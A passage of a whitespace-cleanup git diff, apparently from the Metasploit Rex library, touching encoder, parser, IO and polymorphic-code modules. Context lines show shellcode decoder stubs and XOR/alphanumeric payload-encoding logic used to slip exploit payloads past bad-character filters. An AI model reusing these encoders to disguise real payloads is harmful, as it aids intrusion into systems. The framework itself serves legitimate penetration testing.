+105,10 @@ class UnicodeMixed < Generic "B" + # add [edx], al | "kM" + # imul eax, [eax], 10 * | "A" + # add [edx], al | - "G" + # inc edi | + "G" + # inc edi | "B" + # add [edx], al | "9" + # cmp [eax], eax | - "u" + # jnz ------------------ + "u" + # jnz ------------------ "4JB" return decoder diff --git a/lib/rex/encoder/alpha2/unicode_upper.rb b/lib/rex/encoder/alpha2/unicode_upper.rb index 2e062bce34..adfb7b69bc 100644 --- a/lib/rex/encoder/alpha2/unicode_upper.rb +++ b/lib/rex/encoder/alpha2/unicode_upper.rb @@ -9,7 +9,7 @@ module Alpha2 class UnicodeUpper < Generic def self.default_accepted_chars ; ('B' .. 'Z').to_a + ('0' .. '9').to_a ; end - + def self.gen_second(block, base) # unicode uses additive encoding (block - base) @@ -40,7 +40,7 @@ class UnicodeUpper < Generic 'ESI' => 'VVYA' + mod, # push esi, pop ecx 'EDI' => 'WWYA' + mod, # push edi, pop edi '[ESP]' => 'YA' + mod + '44', # - '[ESP+4]' => 'YUYA' + mod, # + '[ESP+4]' => 'YUYA' + mod, # } return regprefix[reg] diff --git a/lib/rex/encoder/bloxor/bloxor.rb b/lib/rex/encoder/bloxor/bloxor.rb index b7684a32d1..952c5f1aa4 100644 --- a/lib/rex/encoder/bloxor/bloxor.rb +++ b/lib/rex/encoder/bloxor/bloxor.rb @@ -13,12 +13,12 @@ module Encoder @blocks_out = [] @block_size = 0 end - + # # # def decoder_stub( state ) - + if( not state.decoder_stub ) @blocks_out = [] @block_size = 0 @@ -28,34 +28,34 @@ module Encoder # anything too big (if we knew the max size we could try something smaller if we generated a blob too big) #block_sizes = (1..state.buf.length).to_a.shuffle #block_sizes.each do | len | - + 1.upto( state.buf.length ) do | len | - + # For now we ignore all odd sizes to help with performance (The rex poly machine # doesnt have many load/store primitives that can handle byte sizes efficiently) if( len % 2 != 0 ) next end - + blocks, size = compute_encoded( state, len ) if( blocks and size ) - + # We sanity check that the newly generated block ammount and the block size # are not in the badchar list when converted into a hex form. Helps speed # things up a great deal when generating a decoder stub later as these # values may be used throughout. - + if( not number_is_valid?( state, blocks.length - 1 ) or not number_is_valid?( state, ~( blocks.length - 1 ) ) ) next end - + if( not number_is_valid?( state, size ) or not number_is_valid?( state, ~size ) ) next end - + @blocks_out = blocks @block_size = size - + break end end @@ -64,26 +64,26 @@ module Encoder state.decoder_stub = compute_decoder( state ) end - + state.decoder_stub end - + # # # def encode_block( state, data ) - + buffer = '' - + @blocks_out.each do | block | buffer << block.pack( 'C*' ) end - + buffer end - + protected - + # # Is a number in its byte form valid against the badchars? # @@ -96,7 +96,7 @@ module Encoder end return Rex::Text.badchar_index( [ number ].pack( size ), state.badchars ).nil? end - + # # Calculate Shannon's entropy. # @@ -110,44 +110,44 @@ module Encoder end return entropy / 8 end - + # # Compute the encoded blocks (and associated seed) # def compute_encoded( state, len ) blocks_in = ::Array.new - + input = '' << state.buf - + block_padding = ( input.length % len ) > 0 ? len - ( input.length % len ) : 0 - + if( block_padding > 0 ) 0.upto( block_padding-1 ) do input << [ rand( 255 ) ].pack( 'C' ) end end - + while( input.length > 0 ) blocks_in << input[0..len-1].unpack( 'C*' ) input = input[len..input.length] end - + seed = compute_seed( blocks_in, len, block_padding, state.badchars.unpack( 'C*' ) ) if( not seed ) return [ nil, nil ] end - + blocks_out = [ seed ] - + blocks_in.each do | block | blocks_out << compute_block( blocks_out.last, block ) - end - + end + return [ blocks_out, len ] end - + # # Generate the decoder stub which is functionally equivalent to the following: # @@ -166,13 +166,13 @@ module Encoder # end: # def compute_decoder( state ) - + @machine.create_variable( 'source' ) @machine.create_variable( 'dest' ) @machine.create_variable( 'counter' ) @machine.create_variable( 'encoded' ) @machine.create_variable( 'decoded' ) - + chunk_size = Rex::Poly::Machine::BYTE if( @machine.native_size() == Rex::Poly::Machine::QWORD ) if( @block_size % Rex::Poly::Machine::QWORD == 0 ) @@ -181,13 +181,13 @@ module Encoder chunk_size = Rex::Poly::Machine::DWORD elsif( @block_size % Rex::Poly::Machine::WORD == 0 ) chunk_size = Rex::Poly::Machine::WORD - end + end elsif( @machine.native_size() == Rex::Poly::Machine::DWORD ) if( @block_size % Rex::Poly::Machine::DWORD == 0 ) chunk_size = Rex::Poly::Machine::DWORD elsif( @block_size % Rex::Poly::Machine::WORD == 0 ) chunk_size = Rex::Poly::Machine::WORD - end + end elsif( @machine.native_size() == Rex::Poly::Machine::WORD ) if( @block_size % Rex::Poly::Machine::WORD == 0 ) chunk_size = Rex::Poly::Machine::WORD @@ -202,7 +202,7 @@ module Encoder # Block 3 - Set the destingation variable to the value of the source variable @machine.create_block_primitive( 'block3', 'set', 'dest', 'source' ) - + # Block 4 - Set the destingation variable to the address of the 2nd encoded block @machine.create_block_primitive( 'block4', 'add', 'dest', @block_size ) @@ -211,35 +211,35 @@ module Encoder # Block 6 - Set the encoded variable to the byte pointed to by the dest variable @machine.create_block_primitive( 'block6', 'load', 'encoded', 'dest', chunk_size ) - + # Block 7 - Increment the destination variable by one @machine.create_block_primitive( 'block7', 'add', 'dest', chunk_size ) - + # Block 8 - Set the decoded variable to the byte pointed to by the source variable @machine.create_block_primitive( 'block8', 'load', 'decoded', 'source', chunk_size ) - + # Block 9 - Xor the decoded variable with the encoded variable @machine.create_block_primitive( 'block9', 'xor', 'decoded', 'encoded' ) - + # Block 10 - store the newly decoded byte @machine.create_block_primitive( 'block10', 'store', 'source', 'decoded', chunk_size ) - + # Block 11 - Increment the source variable by one @machine.create_block_primitive( 'block11', 'add', 'source', chunk_size ) - + # Block 12 - Jump back up to the outer_loop block while the counter variable > 0 @machine.create_block_primitive( 'block12', 'loop', 'counter', 'block6' ) # Try to generate the decoder stub... decoder = @machine.generate - + if( not decoder ) raise RuntimeError, "Unable to generate decoder stub." end - + decoder end - + # # Compute the seed block which will successfully decode all proceeding encoded # blocks while ensuring the encoded blocks do not contain any badchars. @@ -247,33 +247,33 @@ module Encoder def compute_seed( blocks_in, block_size, block_padding, badchars ) seed = [] redo_bytes = [] - + 0.upto( block_size-1 ) do | index | - + seed_bytes = (0..255).sort_by do rand() end - + seed_bytes.each do | seed_byte | - + next if( badchars.include?( seed_byte ) ) - + success = true - + previous_byte = seed_byte - + if( redo_bytes.length < 256 ) redo_bytes = (0..255).sort_by do rand() end end - + blocks_in.each do | block | - + decoded_byte = block[ index ] - + encoded_byte = previous_byte ^ decoded_byte - + if( badchars.include?( encoded_byte ) ) # the padding bytes we added earlier can be changed if they are causing us to fail. if( block == blocks_in.last and index >= (block_size-block_padding) ) @@ -284,31 +284,31 @@ module Encoder block[ index ] = redo_bytes.shift redo end - + success = false break end - + previous_byte = encoded_byte end - + if( success ) seed << seed_byte break end end - + end - + if( seed.length == block_size ) return seed end - + return nil end # - # Compute the next encoded block by xoring the previous + # Compute the next encoded block by xoring the previous # encoded block with the next decoded block. # def compute_block( encoded, decoded ) @@ -318,9 +318,9 @@ module Encoder end return block end - + end end -end \ No newline at end of file +end diff --git a/lib/rex/encoder/nonalpha.rb b/lib/rex/encoder/nonalpha.rb index 8cff4190fe..4cc954e019 100644 --- a/lib/rex/encoder/nonalpha.rb +++ b/lib/rex/encoder/nonalpha.rb @@ -32,7 +32,7 @@ class NonAlpha if (tablelen > 255) or (block == 0x7B) raise RuntimeError, "BadChar" end - + if (block >= 0x41 and block <= 0x5A) or (block >= 0x61 and block <= 0x7A) # gen offset, return magic offset = 0x7b - block; diff --git a/lib/rex/encoder/nonupper.rb b/lib/rex/encoder/nonupper.rb index d7a598620a..2356b160d5 100644 --- a/lib/rex/encoder/nonupper.rb +++ b/lib/rex/encoder/nonupper.rb @@ -7,8 +7,8 @@ module Rex module Encoder class NonUpper - - + + def NonUpper.gen_decoder() decoder = "\x66\xB9\xFF\xFF" + @@ -26,14 +26,14 @@ class NonUpper "\x28\x07" + # subb [edi], al "\xEB\xF1" + # jmp BACK! "\xEB" + "B" + # jmp [shellcode] - "\xE8\xE2\xFF\xFF\xFF" + "\xE8\xE2\xFF\xFF\xFF" end def NonUpper.encode_byte(badchars, block, table, tablelen) if (tablelen > 255) or (block == 0x40) raise RuntimeError, "BadChar" end - + if (block >= 0x41 and block <= 0x40) or (badchars =~ block) # gen offset, return magic offset = 0x40 - block; diff --git a/lib/rex/encoding/xor/generic.rb b/lib/rex/encoding/xor/generic.rb index 6a1c538a0d..3f94071596 100644 --- a/lib/rex/encoding/xor/generic.rb +++ b/lib/rex/encoding/xor/generic.rb @@ -19,7 +19,7 @@ class Generic # # Now for some internal check methods - # + # # hook stylies! # return index of offending byte or nil @@ -82,7 +82,7 @@ class Generic if !badkeys[strip][kbyte] && !badchars[kbyte.chr] throw :found_kbyte end - + kbyte = (kbyte + 1) & 0xff } diff --git a/lib/rex/image_source/disk.rb b/lib/rex/image_source/disk.rb index 4a4a8b62c8..0b3f5faa83 100644 --- a/lib/rex/image_source/disk.rb +++ b/lib/rex/image_source/disk.rb @@ -31,7 +31,7 @@ class Disk < ImageSource file.seek(file_offset + offset) file.read(len) end - + def index(search, offset = 0) # do a sliding window search across the disk while offset < size diff --git a/lib/rex/image_source/image_source.rb b/lib/rex/image_source/image_source.rb index 9f2456cd43..549388fc4e 100644 --- a/lib/rex/image_source/image_source.rb +++ b/lib/rex/image_source/image_source.rb @@ -39,7 +39,7 @@ class ImageSource end return string end - + end diff --git a/lib/rex/io/datagram_abstraction.rb b/lib/rex/io/datagram_abstraction.rb index 5fa926ff28..24c5ce55cc 100644 --- a/lib/rex/io/datagram_abstraction.rb +++ b/lib/rex/io/datagram_abstraction.rb @@ -26,7 +26,7 @@ module DatagramAbstraction attr_reader :lsock # The right side of the stream (remote) attr_reader :rsock - + protected attr_writer :lsock attr_writer :rsock diff --git a/lib/rex/io/stream.rb b/lib/rex/io/stream.rb index a7dffc368b..7ea11f8c35 100644 --- a/lib/rex/io/stream.rb +++ b/lib/rex/io/stream.rb @@ -36,7 +36,7 @@ module Stream total_sent = 0 total_length = buf.length block_size = 32768 - + begin while( total_sent < total_length ) s = Rex::ThreadSafe.select( nil, [ fd ], nil, 0.2 ) @@ -59,7 +59,7 @@ module Stream rescue ::IOError, ::Errno::EPIPE return nil end - + total_sent end @@ -67,9 +67,9 @@ module Stream # This method reads data of the supplied length from the stream. # def read(length = nil, opts = {}) - + begin - return fd.read_nonblock( length ) + return fd.read_nonblock( length ) rescue ::Errno::EAGAIN, ::Errno::EWOULDBLOCK # Sleep for a half a second, or until we can read again Rex::ThreadSafe.select( [ fd ], nil, nil, 0.5 ) diff --git a/lib/rex/io/stream_abstraction.rb b/lib/rex/io/stream_abstraction.rb index 6d40b21753..65c2b24f9b 100644 --- a/lib/rex/io/stream_abstraction.rb +++ b/lib/rex/io/stream_abstraction.rb @@ -74,14 +74,14 @@ module StreamAbstraction def syswrite(buffer) lsock.syswrite(buffer) end - + # # Low-level read from the local side. # def sysread(length) lsock.sysread(length) end - + # # Shuts down the local side of the stream abstraction. # @@ -164,7 +164,7 @@ protected while( total_sent < total_length ) begin data = buf[total_sent, buf.length] - + # Note that this must be write() NOT syswrite() or put() or anything like it. # Using syswrite() breaks SSL streams. sent = self.write( data ) diff --git a/lib/rex/io/stream_server.rb b/lib/rex/io/stream_server.rb index 8ed10692bb..b314f3e4f7 100644 --- a/lib/rex/io/stream_server.rb +++ b/lib/rex/io/stream_server.rb @@ -156,7 +156,7 @@ protected # Initialize the connection processing on_client_connect(cli) - + # Notify the client monitor self.client_waiter.push(cli) @@ -178,7 +178,7 @@ protected # def monitor_clients begin - + # Wait for a notify if our client list is empty if (clients.length == 0) self.client_waiter.pop diff --git a/lib/rex/job_container.rb b/lib/rex/job_container.rb index cda3afd3ea..acac8ae7f5 100644 --- a/lib/rex/job_container.rb +++ b/lib/rex/job_container.rb @@ -189,7 +189,7 @@ class JobContainer < Hash end list.each(&block) end - + protected attr_accessor :job_id_pool # :nodoc: diff --git a/lib/rex/logging/sinks/stderr.rb b/lib/rex/logging/sinks/stderr.rb index 3ed78801fc..333f157acf 100644 --- a/lib/rex/logging/sinks/stderr.rb +++ b/lib/rex/logging/sinks/stderr.rb @@ -33,7 +33,7 @@ class Stderr end $stderr.write("[#{get_current_timestamp}] [#{code}(#{level})] #{src}: #{msg}\n") end - + $stderr.flush end diff --git a/lib/rex/mac_oui.rb b/lib/rex/mac_oui.rb index 5ec1eaa458..d9e53d80e7 100644 --- a/lib/rex/mac_oui.rb +++ b/lib/rex/mac_oui.rb @@ -12,7 +12,7 @@ module Oui return fullname else return 'UNKNOWN' - end + end end def self.lookup_oui_company_name(mac) @@ -25,7 +25,7 @@ module Oui return fullname else return 'UNKNOWN' - end + end end def self.check_mac(mac) diff --git a/lib/rex/mime/part.rb b/lib/rex/mime/part.rb index 143a1c8de0..290b79458c 100644 --- a/lib/rex/mime/part.rb +++ b/lib/rex/mime/part.rb @@ -4,7 +4,7 @@ module MIME class Part require 'rex/mime/header' - + attr_accessor :header, :content def initialize diff --git a/lib/rex/nop/opty2.rb b/lib/rex/nop/opty2.rb index 6a56521dea..d8ecee25f8 100644 --- a/lib/rex/nop/opty2.rb +++ b/lib/rex/nop/opty2.rb @@ -61,7 +61,7 @@ class Opty2 # Skip it if it's masked off or too large next if ((e & mask) != 0) next if (((e >> 8) & 0xff) > slen) - + byte = e & 0xff # Skip it if it's a bad byte diff --git a/lib/rex/nop/opty2_tables.rb b/lib/rex/nop/opty2_tables.rb index 65f03ae52d..1ce66badba 100644 --- a/lib/rex/nop/opty2_tables.rb +++ b/lib/rex/nop/opty2_tables.rb @@ -18,7 +18,7 @@ module Opty2Tables 66005,65750,245,248,249,252,253,359 ] - StateTable = + StateTable = [ # 0x00 [[65796,66565,1048582,65804,66573,1048590,65812,66581,1048598,65820,66589,1048606,65828,66597,65575,65836,66605,65583,65844,66613,65591,316,1085,65599,65600,131137,262210,524355,1048644,2097221,4194374,8388679,65608,131145,262218,524363,1048652,2097229,4194382,8388687,1048656,1048657,1048658,1048659,1048660,1048661,1048662,1048663,1114200,1179737,1310810,1572955,1048668,3145821,5242974,9437279,1048672,1049704,1048938,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,144,196753,327826,589971,1114260,2162837,4259990,8454295,65688,262297,155,1048732,65695,424,1193,65968,131505,262578,524723,65972,131509,262582,524727,66744,132281,263354,525499,1049788,2098365,4195518,8389823,66005,65750,131552,131553,131554,483,491,245,248,249,252,253,358,359, 0x01018D]], diff --git a/lib/rex/ole/directory.rb b/lib/rex/ole/directory.rb index 6f43c71f44..4b91038686 100644 --- a/lib/rex/ole/directory.rb +++ b/lib/rex/ole/directory.rb @@ -29,7 +29,7 @@ class Directory < DirEntry @num_entries = 1 end - + # woop, recursive each def yield_entries(de, &block) block.call(de) diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb index dd990cc110..adb016610a 100644 --- a/lib/rex/parser/fusionvm_nokogiri.rb +++ b/lib/rex/parser/fusionvm_nokogiri.rb @@ -8,7 +8,7 @@ module Parser load_nokogiri && class FusionVMDocument < Nokogiri::XML::SAX::Document - include NokogiriDocMixin + include NokogiriDocMixin def start_element(name=nil,attrs=[]) return nil if in_tag("JobOrder") @@ -26,7 +26,7 @@ module Parser } thost[:host] = attrs["IPAddress"] thost[:name] = attrs["HostName"] - @host = db_report(:host, thost) + @host = db_report(:host, thost) when "OS" @state[:has_text] = true when "Port" @@ -47,7 +47,7 @@ module Parser when "Title" @state[:has_text] = true when "Description" - @state[:has_text] = true + @state[:has_text] = true when "CVE" @state[:has_text] = true when "References" @@ -86,13 +86,13 @@ module Parser when "CVE" @vuln[:refs] << "CVE-#{@text.strip}" when "References" - unless @text.blank? + unless @text.blank? @text.split(' ').each do |ref| next unless ref.start_with? "http" if ref =~ /MS\d{2}-\d{3}/ @vuln[:refs] << "MSB-#{$&}" - else - @vuln[:refs] << "URL-#{ref.strip}" + else + @vuln[:refs] << "URL-#{ref.strip}" end end end @@ -106,4 +106,4 @@ module Parser end end -end \ No newline at end of file +end diff --git a/lib/rex/parser/ini.rb b/lib/rex/parser/ini.rb index da7d14d354..a5b6595d8e 100644 --- a/lib/rex/parser/ini.rb +++ b/lib/rex/parser/ini.rb @@ -14,7 +14,7 @@ class Ini < Hash # Factories # ## - + # # Creates a new class instance and reads in the contents of the supplied # file path. @@ -52,7 +52,7 @@ class Ini < Hash # # Enumerates the groups hash keys. # - def each_group(&block) + def each_group(&block) self.keys.each { |k| yield } @@ -87,7 +87,7 @@ class Ini < Hash # def from_file(fpath = nil) fpath = path if (!fpath) - + read_groups(fpath) end @@ -167,7 +167,7 @@ protected # Is it a group [bob]? if (md = line.match(/^\[(.+?)\]/)) - active_group = md[1] + active_group = md[1] self[md[1]] = {} # Is it a VAR=VAL? elsif (md = line.match(/^(.+?)=(.*)$/)) diff --git a/lib/rex/parser/ip360_aspl_xml.rb b/lib/rex/parser/ip360_aspl_xml.rb index 700045c413..dcc0e1f752 100644 --- a/lib/rex/parser/ip360_aspl_xml.rb +++ b/lib/rex/parser/ip360_aspl_xml.rb @@ -7,7 +7,7 @@ module Parser class IP360ASPLXMLStreamParser - + @vulnid = nil @appid = nil @location = nil @@ -49,7 +49,7 @@ class IP360ASPLXMLStreamParser @osid = attributes['id'].strip end end - + def text(str) case @state when :is_name diff --git a/lib/rex/parser/nexpose_raw_nokogiri.rb b/lib/rex/parser/nexpose_raw_nokogiri.rb index b7892e5762..87c67f3d8e 100644 --- a/lib/rex/parser/nexpose_raw_nokogiri.rb +++ b/lib/rex/parser/nexpose_raw_nokogiri.rb @@ -13,7 +13,7 @@ module Rex attr_reader :tests NEXPOSE_HOST_DETAIL_FIELDS = %W{ nx_device_id nx_site_name nx_site_importance nx_scan_template nx_risk_score } - NEXPOSE_VULN_DETAIL_FIELDS = %W{ + NEXPOSE_VULN_DETAIL_FIELDS = %W{ nx_scan_id nx_vulnerable_since nx_pci_compliance_status @@ -115,7 +115,7 @@ module Rex when "solution" @state[:has_text] = false collect_vuln_solution - @text = nil + @text = nil when "tag" @state[:has_text] = false collect_tag @@ -217,20 +217,20 @@ module Rex # Mass update vulnerability details across the database based on conditions vdet_info = { :title => @report_data[:vuln]["title"] } vdet_info[:description] = @report_data[:vuln_description] unless @report_data[:vuln_description].to_s.empty? - vdet_info[:solution] = @report_data[:vuln_solution] unless @report_data[:vuln_solution].to_s.empty? + vdet_info[:solution] = @report_data[:vuln_solution] unless @report_data[:vuln_solution].to_s.empty? vdet_info[:nx_tags] = @report_data[:vuln_tags].sort.uniq.join(", ") if ( @report_data[:vuln_tags].kind_of?(::Array) and @report_data[:vuln_tags].length > 0 ) vdet_info[:nx_severity] = @report_data[:vuln]["severity"].to_f if @report_data[:vuln]["severity"] vdet_info[:nx_pci_severity] = @report_data[:vuln]["pciSeverity"].to_f if @report_data[:vuln]["pciSeverity"] vdet_info[:cvss_score] = @report_data[:vuln]["cvssScore"].to_f if @report_data[:vuln]["cvssScore"] vdet_info[:cvss_vector] = @report_data[:vuln]["cvssVector"] if @report_data[:vuln]["cvssVector"] - + %W{ published added modified }.each do |tf| next if not @report_data[:vuln][tf] ts = DateTime.parse(@report_data[:vuln][tf]) rescue nil next if not ts vdet_info[ "nx_#{tf}".to_sym ] = ts end - + ::Mdm::VulnDetail.where(:id => vdet_ids).update_all(vdet_info) @report_data[:vuln] = nil @@ -263,7 +263,7 @@ module Rex end - def record_formatted_content(name, eattrs) + def record_formatted_content(name, eattrs) attrs = attr_hash(eattrs) stack = nil @@ -293,7 +293,7 @@ module Rex when 'URLLink' @report_data[:formatted_link] = attrs["LinkURL"] else - + if @report_data[:formatted_indent] > 1 data = (" " * (@report_data[:formatted_indent])) + data end @@ -305,10 +305,10 @@ module Rex if data.length > 0 stack << data - end + end end - def collect_formatted_content(name) + def collect_formatted_content(name) stack = nil prefix = "" @@ -325,7 +325,7 @@ module Rex end return if not stack - + data = @text.to_s.strip.split(/\n+/).map{|t| t.strip}.join(" ") @text = "" @@ -385,7 +385,7 @@ module Rex # This hash defines the matching criteria to overwrite an existing entry vkey = { :src => 'nexpose', :nx_vuln_id => @state[:test][:id] } - if @state[:nx_device_id] + if @state[:nx_device_id] vdet[:nx_device_id] = @state[:nx_device_id] vkey[:nx_device_id] = @state[:nx_device_id] end @@ -405,12 +405,12 @@ module Rex ts = ::DateTime.parse(@state[:test][:nx_vulnerable_since]) rescue nil vdet[:nx_vulnerable_since] = ts if ts end - + proof = clean_formatted_text(@report_data[:vuln_proof_stack].join.strip) @report_data[:vuln_proof_stack] = [] vuln_info[:info] = proof - vdet[:proof] = proof + vdet[:proof] = proof # Configure the find key for vuln_details vdet[:key] = vkey @@ -423,7 +423,7 @@ module Rex # Report the vulnerability vuln = db.report_vuln(vuln_info) - + if vuln # Report the vulnerability details detail = db.report_vuln_details(vuln, vdet) @@ -652,12 +652,12 @@ module Rex if host_object db.report_import_note(host_object.workspace, host_object) if device_id - detail = { - :key => { :src => 'nexpose' }, + detail = { + :key => { :src => 'nexpose' }, :src => 'nexpose', - :nx_device_id => device_id + :nx_device_id => device_id } - detail[:nx_console_id] = @nx_console_id if @nx_console_id + detail[:nx_console_id] = @nx_console_id if @nx_console_id NEXPOSE_HOST_DETAIL_FIELDS.each do |f| v = @report_data.delete(f.to_sym) diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb b/lib/rex/parser/nokogiri_doc_mixin.rb index aad4ea779e..9a5b04de91 100644 --- a/lib/rex/parser/nokogiri_doc_mixin.rb +++ b/lib/rex/parser/nokogiri_doc_mixin.rb @@ -102,7 +102,7 @@ module Parser return [] unless orig_refs refs = [] orig_refs.each do |ref_hash| - + ref_hash_sym = Hash[ref_hash.map {|k, v| [k.to_sym, v] }] ref_type = ref_hash_sym[:source].to_s.strip.upcase ref_value = ref_hash_sym[:value].to_s.strip diff --git a/lib/rex/parser/retina_xml.rb b/lib/rex/parser/retina_xml.rb index 4c34cde91e..ed1ced1f00 100644 --- a/lib/rex/parser/retina_xml.rb +++ b/lib/rex/parser/retina_xml.rb @@ -17,7 +17,7 @@ class RetinaXMLStreamParser @host = { 'vulns' => [] } reset_audit_state end - + def reset_audit_state @audit = { 'refs' => [] } end @@ -106,5 +106,5 @@ __END__ - + diff --git a/lib/rex/parser/wapiti_nokogiri.rb b/lib/rex/parser/wapiti_nokogiri.rb index d9aad2d461..c5e04c2184 100644 --- a/lib/rex/parser/wapiti_nokogiri.rb +++ b/lib/rex/parser/wapiti_nokogiri.rb @@ -64,7 +64,7 @@ module Rex def report_vuln(&block) proto = @state[:url].split(":")[0] path = '/' + (@state[:url].split("/")[3..(@state[:url].split("/").length - 1)].join('/')) - + web_vuln_info = {} web_vuln_info[:web_site] = proto + "://" + @state[:host] + ":" + @state[:port] web_vuln_info[:path] = path @@ -85,7 +85,7 @@ module Rex elsif param.index("alert") web_vuln_info[:pname] = param.split('=')[0] #xss end - end + end web_vuln_info[:host] = @state[:host] web_vuln_info[:port] = @state[:port] diff --git a/lib/rex/payloads/win32/kernel/recovery.rb b/lib/rex/payloads/win32/kernel/recovery.rb index b9825eafc1..cc4cb09d29 100644 --- a/lib/rex/payloads/win32/kernel/recovery.rb +++ b/lib/rex/payloads/win32/kernel/recovery.rb @@ -23,7 +23,7 @@ module Recovery # Infinite 'hlt' loop. # def self.spin(opts = {}) - "\xf4\xeb\xfd" + "\xf4\xeb\xfd" end # diff --git a/lib/rex/peparsey/pe_memdump.rb b/lib/rex/peparsey/pe_memdump.rb index cf72ce5397..85f118f8c7 100644 --- a/lib/rex/peparsey/pe_memdump.rb +++ b/lib/rex/peparsey/pe_memdump.rb @@ -24,11 +24,11 @@ class PeMemDump < Pe end def self.new_from_file(filename, disk_backed = false) - + if filename[-4, 4] != '.rng' raise "Not a .rng file: #{filename}" end - + if filename[-9, 9] == "index.rng" raise SkipError end @@ -51,7 +51,7 @@ class PeMemDump < Pe self.sections = [ self.header_section ] self.image_base = 0 end - + def all_sections self.sections end diff --git a/lib/rex/peparsey/section.rb b/lib/rex/peparsey/section.rb index dfec34e7a7..3036028929 100644 --- a/lib/rex/peparsey/section.rb +++ b/lib/rex/peparsey/section.rb @@ -48,7 +48,7 @@ class Section return nil if !_section_header _section_header.v['Characteristics'] end - + def vma # a section header is not required return nil if !_section_header @@ -59,8 +59,8 @@ class Section # a section header is not required return nil if !_section_header _section_header.v['SizeOfRawData'] - end - + end + def _check_offset(offset, len = 1) if offset < 0 || offset+len > size raise BoundsError, "Offset #{offset} outside of section", caller diff --git a/lib/rex/pescan/scanner.rb b/lib/rex/pescan/scanner.rb index 01e83bfd55..be55c11edd 100644 --- a/lib/rex/pescan/scanner.rb +++ b/lib/rex/pescan/scanner.rb @@ -32,7 +32,7 @@ module Scanner if(param['disasm']) #puts [msg].pack('H*').inspect insns = [] - + msg.gsub!("; ", "\n") if msg.include?("retn") msg.gsub!("retn", "ret") diff --git a/lib/rex/pescan/search.rb b/lib/rex/pescan/search.rb index 1202fd3bad..19cb919c64 100644 --- a/lib/rex/pescan/search.rb +++ b/lib/rex/pescan/search.rb @@ -4,36 +4,36 @@ module PeScan module Search require "rex/assembly/nasm" - + class DumpRVA attr_accessor :pe - + def initialize(pe) self.pe = pe end - + def config(param) @address = pe.vma_to_rva(param['args']) end - + def scan(param) config(param) - + $stdout.puts "[#{param['file']}]" - + # Adjust based on -A and -B flags pre = param['before'] || 0 suf = param['after'] || 16 - + @address -= pre @address = 0 if (@address < 0 || ! @address) - + begin buf = pe.read_rva(@address, suf) rescue ::Rex::PeParsey::WtfError return end - + $stdout.puts pe.ptr_s(pe.rva_to_vma(@address)) + " " + buf.unpack("H*")[0] if(param['disasm']) insns = [] @@ -51,8 +51,8 @@ module Search addr = di.next_addr end end - - end + + end end class DumpOffset < DumpRVA @@ -62,7 +62,7 @@ module Search rescue Rex::PeParsey::BoundsError end end - end + end end end end diff --git a/lib/rex/platforms/windows.rb b/lib/rex/platforms/windows.rb index 85011d20b8..781ac34c08 100644 --- a/lib/rex/platforms/windows.rb +++ b/lib/rex/platforms/windows.rb @@ -46,7 +46,7 @@ module Windows HKEY_LOCAL_MACHINE end end - + end end end diff --git a/lib/rex/poly/machine.rb b/lib/rex/poly/machine.rb index 9e60195da1..9213444752 100644 --- a/lib/rex/poly/machine.rb +++ b/lib/rex/poly/machine.rb @@ -3,10 +3,10 @@ module Rex module Poly - require 'metasm' + require 'metasm' require 'rex/poly/machine/machine' require 'rex/poly/machine/x86' end - + end diff --git a/lib/rex/poly/machine/machine.rb b/lib/rex/poly/machine/machine.rb index 6bac6a8b1f..8e569de956 100644 --- a/lib/rex/poly/machine/machine.rb +++ b/lib/rex/poly/machine/machine.rb @@ -2,29 +2,29 @@ module Rex module Poly - + # # A machine capable of creating a small blob of code in a metamorphic kind of way. # Note: this is designed to perform an exhaustive search for a solution and can be - # slow. If you need a speedier option, the origional Rex::Polly::Block stuff is a + # slow. If you need a speedier option, the origional Rex::Polly::Block stuff is a # better choice. # class Machine - + QWORD = 8 DWORD = 4 WORD = 2 BYTE = 1 - + # # A Permutation! # class Permutation - + attr_accessor :active, :offset - + attr_reader :name, :primitive, :length, :args - + # # Create a new permutation object. # @@ -40,14 +40,14 @@ module Rex @offset = 0 @children = ::Array.new end - + # # Add in a child permutation to this one. Used to build the permutation tree. # def add_child( child ) @children << child end - + # # Does this permutation have children? # @@ -62,7 +62,7 @@ module Rex def remove_children @children.clear end - + # # Actully render this permutation into a raw buffer. # @@ -107,12 +107,12 @@ module Rex end # Update the length to reflect the new raw buffer @length = raw.to_s.length - # As the temp variable is only assigned for the duration of a single permutation we + # As the temp variable is only assigned for the duration of a single permutation we # can now release it if it was used in this permutation. @machine.release_temp_variable return raw.to_s end - + # # Test if this permutation raw buffer is valid in this machine (e.g. against the badchar list). # @@ -132,10 +132,10 @@ module Rex # Should a temporary variable have been assigned we can release it here. @machine.release_temp_variable end - end + end return result end - + # # Try to find a solution within the solution space by performing a depth first search # into the permutation tree and backtracking when needed. @@ -172,9 +172,9 @@ module Rex # No children can be made form part of the solution, return failure for this path in the tree. return false end - + end - + # # A symbolic permutation to mark locations like the begining and end of a group of blocks. # Used to calculate usefull offsets. @@ -189,7 +189,7 @@ module Rex # A symbolic block is allways active! @active = true end - + # # We block all attempts to set the active state of this permutation so as # it is always true. This lets us always address the offset. @@ -197,76 +197,76 @@ module Rex def active=( value ) end end - + # # A primitive is a machine defined permutation which accepts some arguments when it is called. # class Primitive - + # # Initialize this primitive with its target source procedure and the machine it belongs to. # def initialize( source ) @source = source end - + # # Call the primitives source procedure, passing in the arguments. # def call( name, machine, *args ) return @source.call( name, machine, *args ) end - + end - + # # # class Block - + #attr_accessor :next, :previous attr_reader :name - + def initialize( name ) @name = name @next = nil @previous = nil @permutations = ::Array.new end - + def shuffle @permutations = @permutations.shuffle end - + def solve @permutations.first.solve end - + def << ( permutation ) @permutations << permutation end - + def each @permutations.each do | permutation | yield permutation end end - + end - + # # A class to hold a solution for a Rex::Poly::Machine problem. # class Solution - + attr_reader :offset - + def initialize @permutations = ::Array.new @reg_state = ::Array.new @offset = 0 end - + # # Reset this solution to an empty state. # @@ -279,7 +279,7 @@ module Rex @permutations.clear @reg_state.clear end - + # # Push a new permutation onto this solutions permutations list and save the associated register/variables state # @@ -290,7 +290,7 @@ module Rex @permutations.push( permutation ) @reg_state.push( [ [].concat(reg_available), [].concat(reg_consumed), {}.merge(variables) ] ) end - + # # Pop off the last permutaion and register/variables state from this solution. # @@ -342,45 +342,45 @@ module Rex end return raw end - + end - + # # Create a new machine instance. # def initialize( badchars, cpu ) @badchars = badchars @cpu = cpu - + @reg_available = ::Array.new @reg_consumed = ::Array.new @variables = ::Hash.new @blocks = ::Hash.new @primitives = 